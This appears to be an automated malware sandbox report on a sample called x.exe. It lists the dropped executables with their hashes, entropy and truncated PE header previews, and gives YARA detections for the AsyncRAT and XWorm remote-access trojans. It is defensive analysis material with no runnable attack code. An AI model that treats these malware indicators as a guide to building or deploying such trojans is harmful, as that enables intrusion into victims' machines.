                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4473576
                                      Entropy (8bit):6.5697251244545924
                                      Encrypted:false
                                      SSDEEP:98304:9kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:9kkCqaE68eV+0y8E6L1
                                      MD5:A0E84CEDA4163F189BE5349FD432B1CB
                                      SHA1:204335080CD8BA8D46E52DFB29F1461D7BF84CA1
                                      SHA-256:9A8C97840B4745ABA6BE44CAE7DE9EC0E7960AE31E52DFDE4ACCB1C24B6C4DA7
                                      SHA-512:BE941C507F9A607087E96CDBA94358F4882BA231CC08E6AAE8480301A5FF82940630134F9DB780B9527F43DD83ABE5D4868759854D2517A6D6A87A26903FCC9F
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):501656
                                      Entropy (8bit):6.316687804131066
                                      Encrypted:false
                                      SSDEEP:12288:mLH18t6x1hjaNHBlfBVDZS82JninSFVlDW:mLOwxyNHBVEHRiSFVlDW
                                      MD5:EE696711CF9AC80FC9EFBB26B76ABCFE
                                      SHA1:A2E66B1A8970B93B055B783F1FE600A5EA861690
                                      SHA-256:9DA9F59CB0DF8F42679E524FDF590843F68D1413BB1F36335B361245F5FD7170
                                      SHA-512:5A6E226B94364E8F0312D8DE64192A5343EB5E370BC5E10F373458C871A25ABE7520E55AD68279FD215820CABEDADDE4ACA9A01071370B980B62A0126AAB2A94
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1637776
                                      Entropy (8bit):6.316076233282021
                                      Encrypted:false
                                      SSDEEP:24576:z7Z1jyzcKSmKsvwMZJ1XBsn/gu2bRC6dulyyn2WdXM6cWlLIJ:/Z1tKTwMZJ1XBsn/UC6dugWA
                                      MD5:2E0AE929AA0C46D1850BD2064954D911
                                      SHA1:C27307CF87ABAA9CB17C869583BEC5DBB57A3C41
                                      SHA-256:BB21F5661BC8569FBAD37E05E000529EA09A93DF9CE906AC798B6FF87C39DB52
                                      SHA-512:6F79861A391A35B7634EA05FD37B28ECEA234FE91AC44B3F2DD365F49C9338AA43D5EF40B80588343E7C1B05D2B358F9516F2696F6DB1E4D9D8EA87CBFADB1E1
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):224632
                                      Entropy (8bit):5.620193770987743
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCvFtCsHjgU7HOg6KTe/+EypudsD22QnSUEhydebz41:Pu9tx0SA+EySaQKeUz41
                                      MD5:96A64BD0E265640FFAFD214049708702
                                      SHA1:DA525339352A6F40A51DD61FE17149EC37E69C61
                                      SHA-256:4E88BCEBE61AFD28AD1EC55523F1656CA98F02806531CEFFCA55F2598674CFFA
                                      SHA-512:EA63C18E5AB547A7F76C6BD2F721296B400E2D6FE89C45DFD8DFAB86A794D171A44487CAB0C8DC2328F9DC92C239BB1E2BF55D7C903791EF341BD88FEAE28FB0
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):431336
                                      Entropy (8bit):5.901379876199201
                                      Encrypted:false
                                      SSDEEP:6144:PuYzBRUKCBTwZVr2miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVV+:jzBRnCBOrsBOBf
                                      MD5:E7C3CF515AE2F8559EB6E76D748D667F
                                      SHA1:265615DC51ACBDE842A9A012D03732AA4BF9DDE9
                                      SHA-256:A2CAC1656374C752299952716F9021B3E15497166FA936A1BAD6AB7C39FE7F8A
                                      SHA-512:9034265306CF0A5D467C652FEAE1AD6FB4798B527A8C58EED576137582EBF6F24DD25D9EC9D977C93A489E749F1F1A20503B508C168CC9C54419AEDA9B044458
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):175160
                                      Entropy (8bit):5.99132731187077
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC2/VpSIcnsHKTe8LnZCA5OfkQAm95kQOJeqx6u:Pu2tkIpdA5OfzDUeqx6u
                                      MD5:C41D1423579C9814533D2E30DA685786
                                      SHA1:B8AE1B9A8EA125CFA003E1404F44F825F3EFA4AE
                                      SHA-256:BEE3417F4A10BA18D5DDF56EF7D3AF8597164CE62C74D4E979E09BAD6C7D6509
                                      SHA-512:52DC28327704F55153CB10ADB7686D5469698D07ECF6E03B223F8DE2C32DF5296BA7E0190E37A58ECCA264C1B045CF7CA1F2AE35F15BA4F43B51D92961F7F90E
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3162480
                                      Entropy (8bit):6.468488558909844
                                      Encrypted:false
                                      SSDEEP:49152:vnW4jqFRZega3xejvY7GQOx4K1fm15FKqO7t78Ity6fod76lmlW8U:ms3OBj4UmOH
                                      MD5:3A5E520F6C98AFDEA3D5D2D92483C739
                                      SHA1:A578D0612B92D4E3D3C913B06BE977EDFA7ACC20
                                      SHA-256:BE77D2388C60AB0610D2B49BF1883F24B40C33C767160FBF178F2EF3EA3834AE
                                      SHA-512:A3451E0C8CAF184343F68D29406D95BFBDE38F03C8AD0FFC4EDED0B3F4942ACE98D17189C574364730A7BF0F249808371175063312A00F9D85EABB61A5657673
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1309408
                                      Entropy (8bit):6.49550103750245
                                      Encrypted:false
                                      SSDEEP:24576:9+sGOL9NLM3r4Viwj6KLqGua43loEeUFmwv:94AA4eGua43lgUFrv
                                      MD5:EAD6386843778A730062C698AA030740
                                      SHA1:F24C8F0717004F67681BC64DACD4187A98D596B2
                                      SHA-256:D932B4622D4D9A52924CB1540B483EF7163D67263A0E0EBA11504B73295B8D80
                                      SHA-512:0E7641E940526213DFD1627CC80852FE8DC6D9ED3582E30FF355DD56978794B850081082FE7B798152D8AE0E437212471C3C615714FF9CE1DC87434235716516
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):922944
                                      Entropy (8bit):6.460885615415187
                                      Encrypted:false
                                      SSDEEP:12288:R9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+poPCcqyt4:n/BrnYuqFcL3pQ+pDX
                                      MD5:F0BF9ADF513239520A14EB785BDD5886
                                      SHA1:F1915F5400458CA477B5E90DE9A2C5C4DDC132CB
                                      SHA-256:AC67389D5DA5FC3A99576D5832BEC09D66B41E751A15B1B53349A3003EF14DFE
                                      SHA-512:13CC35E7344418CF48E95525F351585652B9A499FF674DE766AED5D7B35F93F60FA9639AF011E0FCEB5F63AD895EDDBE0054EFE98922811BBE6206E52197AF82
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):501544
                                      Entropy (8bit):6.316070563003216
                                      Encrypted:false
                                      SSDEEP:12288:mLH18t6x1hjaNHBlfBVDZS82Jn8YSFVhwDW:mLOwxyNHBVEHR8xFVhwDW
                                      MD5:E7018A93116CD346F9F8A0CC2243295E
                                      SHA1:89155DDC39A59182E5CD870C4D16688AEB2E30FC
                                      SHA-256:A09544750353F4CD7DE1630460B6CD65F42524A51886FFA20857A220C5190211
                                      SHA-512:61428F7197B96297E15074C88F214D5247ED06BC5787A1403A87AAA479D6DDD860BC2FAFA8FF95DAD863632A898315313D353C9147118A7BE2E11ECFD21AF788
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1637776
                                      Entropy (8bit):6.316140077808731
                                      Encrypted:false
                                      SSDEEP:24576:zzZzKrsdCmasrf9Xr5wzW27+w3E4nZ1jDkCZTunfmrd/Mq8pqiV+yeci+HMJ:HZ5d3f9Xr5wzW2x3E4vDkCZTEJ+3
                                      MD5:5D2BD0DA80A8E62789209A0EDAB83B1D
                                      SHA1:757F87BD301AA6F57CE838BE3153B8830921B501
                                      SHA-256:EAB3120F77B545B22123182F21EC23BEDE944108CC3C684E7BD282F7049B5535
                                      SHA-512:FE38763D90349CD0A6816E1EF7B49B6FDA6D7ED3102960F2033FD9FB24EA22FE28B49C0638D971B673D6E24C81FC03D7A414530007F68D005454C645E06F1898
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):224632
                                      Entropy (8bit):5.619874211696376
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCrNzQsUdR7ROPHKTeA+EyBEBsLj6mCv0MC+8w+l+jDYgb:PupzrUdH7+Ey6yxCyncDYgb
                                      MD5:C13590C04F1E3D09263F396F200D3452
                                      SHA1:3DFBDA0E787B01FA3F39AA2852C2EFAA2BBE9DD7
                                      SHA-256:F1D24A7B92913E56B479B077CA38CF87F4153D9154AF1FFC1B27F2DC03C3408A
                                      SHA-512:8A32E90E9C1C3C326EB225B63FE0D2FABC7E4E2C7ADF8367E4016180D004F7DAFFF0ED24FC398F04CBF95EF6DB4F8F87F4AD21F76141AD2BF8351F4C11AD04B5
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1922888
                                      Entropy (8bit):6.541750856572876
                                      Encrypted:false
                                      SSDEEP:49152:BxzduwxBjJMXDUlxqK/PDLWf+kfilcOk+4AgAQx:9uADax
                                      MD5:49F38F9FA23BAA8E1B8F5FF1B370B96B
                                      SHA1:B1B947630361E3C9B0B9CD17A2E95BF193EA427A
                                      SHA-256:1A36E884AA4A5DD09F648BB3DE9F89206DCFFF49A37B1164E5F5477F1FA24D79
                                      SHA-512:20DFF8A6AF31281E0F566CE03A60BECB36C99AF79493C0B06FC12C34003B00238990971E8E2D840554D96BD69A23B1BF506AFDA46B71D2908E75B640D574624C
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):431256
                                      Entropy (8bit):5.900901024115435
                                      Encrypted:false
                                      SSDEEP:6144:Pu4DBRMKC2DARcy85smiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVL3:zDBRPC23DWqOhf
                                      MD5:165B08FB9A429B745E9E168D329EB478
                                      SHA1:AC79D629D68A6177ADB43161D3731AF138802511
                                      SHA-256:3CB517BD21BD184AEA460E8925C81B16A8D6DD26D394AD9123F8C2AD943E6E8B
                                      SHA-512:F740313E067A29A4DFC358AA960B8E73AE350CA3F34FB851209E3505E49349B0A736BA0C5015CE6494DB43021B9A118CBD3BE3E467642F1F7AFD47EC0DF85519
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):175056
                                      Entropy (8bit):5.99353613364511
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCVBGrjhgGcKTeA4yJjAYykykBdg+FoQOJb/B1a:PuVgfhFAYykySfUb/B1a
                                      MD5:12C030EA2C1A9660563DEE8B7A25B079
                                      SHA1:A6FDE7087411C992CDE0D4E87E622C0C3A015527
                                      SHA-256:1F140237E5B5DAB4789F967B50E6994E1D9307B25ACB2E521CB72692B0EA44C7
                                      SHA-512:A39A033F4756D8068F60568BCADB9BE8A0AE8593A44AD72BDD069DEA4280C137FFD78D0CE04B359409EA3EA8FF5A6E8B5A56032D7952FBEF35FB95BCE556C5EA
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3158376
                                      Entropy (8bit):6.463770375021316
                                      Encrypted:false
                                      SSDEEP:49152:M7Inw/bT9uzlAndnpufoDbRwU/xv3lNOsWReEQZeEO1QOiPQOo4r+U:I/VmUAYrj
                                      MD5:F747D7C1167AE52C17B8EE2B2B648F50
                                      SHA1:7F99741F5EE38CEB68388AD913638C34AD9BDD81
                                      SHA-256:BDF99F70C03F23725102CB413F9069900350E5911F4566CFB5447284D4B28256
                                      SHA-512:A983A8C9114BFB32DCB2E42CF907EABC41B7DDF335B661F1BBCFA35C59CB238A2C0B1864F95F76B781BAD0198F82E0E25BC3754D8AA349AAF999FA70501413B3
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1309536
                                      Entropy (8bit):6.494467247437919
                                      Encrypted:false
                                      SSDEEP:24576:/vbIUnHtg+i54V0tqDNbu5kDIPQy+NTD4XnFzr:/zXzdMkDIPQy+Nv4Vr
                                      MD5:2E10137A170646449F276989631090FB
                                      SHA1:809AB6D6099509DF331284F36A8B8AD463C3A9D2
                                      SHA-256:7B9223995309B804C92D3244ACB070FC23B4A6FCAFFAD882CF7EA87C451C2A50
                                      SHA-512:C6F93A90B753C9FC3CE8655A95C358A2892AE8CFC11E615B9443F1317D3FE5699E98A752B100AF12A253064DC4F0E7DB570B06D86DEE4374422DB8C9C0117A6A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):922960
                                      Entropy (8bit):6.460975970387529
                                      Encrypted:false
                                      SSDEEP:12288:R9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+pouCcqC7D4:n/BrnYuqFcL3pQ+pYmE
                                      MD5:8620D3407D835BF915F0FFF81B796100
                                      SHA1:BECA62BD742B85C5DAE7E40C12E224540FE5D527
                                      SHA-256:FC8B94FB0206DE6668B6F6711EFAF59F21E5814AAD2D097729AB830929310383
                                      SHA-512:BC5AD43D7A563BCA425B22A199F49F9C2D1851FEAFACB7C74AECDB11845C0D24BA0B511D63A56E3B7CD3ADF81965FA70340B3DBAF8DAEE66A23DEADDBF218A86
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):692064
                                      Entropy (8bit):7.194014407923939
                                      Encrypted:false
                                      SSDEEP:12288:IskY7gjcjhVIEhqgM7bWvcsi6aVUfIy+U40vy3W/ceKSHMsiFyY6XNmnMwJ:IsZgjS1hqgSC/izkfFjymk4HM5yJwMK
                                      MD5:449FF18CECF6F5F51192A3B2DED55D19
                                      SHA1:344C9315CC65A9A8B57B7CA713EDDCFC00BD7A93
                                      SHA-256:0F891BFC3F74490937A0A339092EC8515409EC972B0EE12A7F3A21EA039CD706
                                      SHA-512:474720A4D8E0E992343DE1A897072C9062A5149E4F235013A28DF8C1DBA19020EA894231C1AAB7F5B3C041FD67CF3B2A26E5B25C7D6901FB4B0BEFCCB57957B4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):2232
                                      Entropy (8bit):5.38001807625381
                                      Encrypted:false
                                      SSDEEP:48:jWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugei/ZvUyus:jLHyIFKL3IZ2KRH9Oug8s
                                      MD5:CAFED418AEAEA20F09A79022ADF107E0
                                      SHA1:FF343B0D653868819AF4032F2C7A4A802A4F3B0E
                                      SHA-256:9F9D5A9B504828F7AAF44339E735DECA0D78532F948CE057A2D8F841B8CF5424
                                      SHA-512:F4EF3760C696C5F5F3D45224543F006D4DC47053179254E314F5DBCB2CD8F3265005CC23B4022F1FA27A8275B40D952968180E90F36C3091C210F9AF751DE7CE
                                      Malicious:false
                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):46592
                                      Entropy (8bit):5.848041824576861
                                      Encrypted:false
                                      SSDEEP:768:B68rPcT5+tkzOGvAX8WuFZ4hJF5PC9O9W68OMhl3/OV/8:08r8ItiOeW894Fc9UW68OM3eE
                                      MD5:9F4FFCEB9E7905107492815B7EBFDC13
                                      SHA1:417E66C983CE65D0588CAB57EBDAD317A9FEF818
                                      SHA-256:6FB45016BB75A9968AE3ADC15A03B8C2E94BD22342F306F1E52A03BF498D5AF9
                                      SHA-512:E724C98562C96CB5F8AEC64167DFC122FA005AF06D1A4A20DC58549D20966DA0B722D58C16330785B8AF2435A199436DD1723AECC21FA127A65B4A8F44452357
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: ditekSHen
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|f................................. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......|]..(Z............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                      Process:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):54
                                      Entropy (8bit):4.456017770914996
                                      Encrypted:false
                                      SSDEEP:3:rRSF1M4W3+dKSAmNS/Fsra:EFG4pKSA6S/Wra
                                      MD5:DC56B8F5D6A48BF67D88D1622EF86336
                                      SHA1:54476F55D0CD6E9368F2A6F67E36E1296E30FC1D
                                      SHA-256:9D41F07F85D2B9008A92D805C9B2F261B34CAE813086C888BE2FC1C820AF111B
                                      SHA-512:815847D233ADE33884D7B35EA8C109FA7B5E87C0222FA5D47D73A7CD5C592B1140E3927D2D8E677F19DCC514DDCAADC7C983E60FF03DD90965087EA0CEB46B9A
                                      Malicious:false
                                      Preview:....### Administrator: Windows PowerShell ###..[WIN]r
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
